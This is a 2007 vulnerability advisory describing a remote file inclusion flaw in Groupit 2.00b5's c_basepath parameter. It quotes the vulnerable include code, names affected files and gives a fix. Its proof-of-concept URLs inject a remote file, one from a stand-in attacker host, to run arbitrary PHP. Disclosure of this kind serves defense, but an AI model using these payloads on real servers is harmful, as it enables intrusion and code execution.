Groupit 2.00b5 (c_basepath) Remote File Inclusion Vulnerability

Risk: High
Local: No
Remote: Yes

CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

ECHO_ADV_75$2007 ------------------------------------------------------------------------ ------------- [ECHO_ADV_75$2007] Groupit 2.00b5 (c_basepath) Remote File Inclusion Vulnerability -------------------------------------- ---------------------------------------------- Author : Dedi Dwianto a.k.a the_day Date Found : March, 15th 2007 Location : Indonesia, Jakarta web : Critical Lvl : Highly critical Impact : System access Where : From Remote ------------------------------------------------------------------------ --- Affected software description: ~~~~~~~~~~~~~~~~~~~~~~~~~ Application : Groupit version : 2.00b5 URL : .gz ------------------------------------------------------------------------ --- Vulnerability: ~~~~~~~~~~~ - Invalid include function at html/content.php -----------------------html/content.php------------ <? ... include "$c_basepath/base/"; if (!empty($c_is_search)) { include "$c_basepath/modules/search/"; } else { if ($c_is_section) { include "$c_basepath/modules/content/"; } else ......... include "$c_basepath/base/"; ?> ---------------------------------------------------------- Input passed to the "$c_basepath" parameter in is not properly verified before being used. This can be exploited to execute arbitrary PHP code by including files from local or external resources. also affected files : html/userprofile.php html/password.php html/dispatch.php html/deliver.php and More .... Proof Of Concept: ~~~~~~~~~~~~ http://localhost/groupit/html/content.php?c_basepath= inject.txt? http://localhost/groupit/html/userprofile.php?c_basepath=http://atacker. com/inject.txt? http://localhost/groupit/html/password.php?c_basepath= /inject.txt? Solution: ~~~~ - Sanitize variable $c_basepath affected files. - Turn off register_globals ------------------------------------------------------------------------ --- Shoutz: ~ ~ y3dips,moby,comex,z3r0byt3,K-159,c-a-s-e,S`to,lirva32,anonymous ~ Jessy Nice Girl ~ az001,bomm_3x,matdhule ~ newbie_hacker (at) yahoogroups (dot) com [email concealed] ~ #aikmel - #e-c-h-o ------------------------------------------------------------------------ --- Contact: ~ EcHo Research & Development Center erdc[at]echo[dot]or[dot]id the_day[at]echo[dot]or[dot]id -------------------------------- [ EOF ]----------------------------------

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